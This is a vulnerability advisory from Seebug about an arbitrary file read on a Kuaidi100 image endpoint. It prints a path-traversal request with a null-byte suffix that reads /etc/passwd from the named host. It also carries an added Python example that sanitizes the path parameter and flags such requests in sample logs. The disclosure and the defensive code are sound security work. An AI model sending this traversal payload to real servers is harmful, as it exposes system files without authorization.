Arbitrary file read in Kuaidi100 (a Kingdee subsidiary)

2015-07-22T00:00:00
ID SSV:93807
Type seebug
Reporter Root
Modified 2015-07-22T00:00:00

Description

Brief description:

RT (see title)

Detailed description:

http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView

The photo-viewing endpoint allows arbitrary file read via %00 (null byte) truncation of the requested path:

GET /youshang-network/getImage?path=2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg HTTP/1.1
Host: net.kuaidi100.com
Proxy-Connection: keep-alive
Accept: image/webp,*/*;q=0.8
User-Agent:
Referer: http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:

[Screenshot 金碟2.png: https://images.seebug.org/upload/201507/22134906157572b036364153e907cc7837e454c9.png]
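The request above combines two weaknesses in the `getImage` handler: a `..` sequence that climbs out of the upload directory, and a `%00` that lets an unsafe file API drop the `.jpg` suffix the extension check relied on. The following added example (not code from the advisory or from Kuaidi100) shows the defender-side handling in Python: the `path` value is checked for NUL bytes, normalized, confined to an assumed upload root (`/var/www/uploads`, a hypothetical path), and only then checked for an allowed image extension; a second function flags the same patterns in constructed access-log lines so the attempt can be detected after the fact.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical upload root; the advisory does not state the real directory.
IMAGE_ROOT = "/var/www/uploads"
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def sanitize_image_path(raw_value: str):
    """Return the normalized path relative to IMAGE_ROOT, or None to reject.

    raw_value is the URL-encoded `path` query parameter. Most frameworks hand
    it over already decoded; decoding here keeps the example self-contained.
    """
    decoded = unquote(raw_value)

    # 1. A NUL byte would truncate the name inside a C-backed file API, so the
    #    extension checked below would not be the extension actually opened.
    if "\x00" in decoded:
        return None

    # 2. Treat backslashes as separators so "..\\" is not missed on Windows hosts,
    #    and refuse absolute paths outright.
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):
        return None

    # 3. Lexical normalization collapses "a/../b"; anything that still starts
    #    with ".." (or is empty) escapes the root and is rejected.
    normalized = posixpath.normpath(decoded)
    if normalized in (".", "..") or normalized.startswith("../"):
        return None

    # 4. Only now is the extension meaningful, because it is the real one.
    if posixpath.splitext(normalized)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    return normalized


def serve_image_path(raw_value: str, root: str = IMAGE_ROOT):
    """Absolute path the handler may open, or None if the request is rejected."""
    relative = sanitize_image_path(raw_value)
    if relative is None:
        return None
    return posixpath.join(root, relative)


def flag_suspicious_requests(log_lines):
    """Return (line_number, reason) for getImage requests carrying a NUL byte
    or a traversal sequence, after URL-decoding the line once."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        if "/getImage?" not in line:
            continue
        decoded = unquote(line).replace("\\", "/")
        reasons = []
        if "\x00" in decoded:
            reasons.append("null byte")
        if "../" in decoded:
            reasons.append("path traversal")
        if reasons:
            hits.append((number, ", ".join(reasons)))
    return hits


# Constructed access-log lines for demonstration; the second one carries the
# request shown in the advisory.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [22/Jul/2015:13:48:01 +0800] "GET /youshang-network/getImage?path=2015-07%2F2015-07-22%2Fphoto.jpg HTTP/1.1" 200 48211',
    '10.0.0.9 - - [22/Jul/2015:13:49:06 +0800] "GET /youshang-network/getImage?path=2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg HTTP/1.1" 200 1874',
    '10.0.0.5 - - [22/Jul/2015:13:49:30 +0800] "GET /youshang-network/logined/auditInfo?method=auditInfoView HTTP/1.1" 200 9120',
]


if __name__ == "__main__":
    print(serve_image_path("2015-07%2F2015-07-22%2Fphoto.jpg"))
    print(serve_image_path("2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg"))
    print(flag_suspicious_requests(SAMPLE_ACCESS_LOG))
```

The ordering matters: the NUL check comes first because a truncated name invalidates every check that follows, and the extension is tested on the normalized name rather than the raw input so that no suffix can be smuggled past it. Symlinks planted inside the upload root are a separate concern; on a real deployment the path returned by `serve_image_path` should additionally be resolved with `os.path.realpath` and compared against the resolved root before the file is opened.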

Proof of vulnerability:

[Screenshot 金碟1.png: https://images.seebug.org/upload/201507/2213483934019afba6694a12223131981b638be4.png]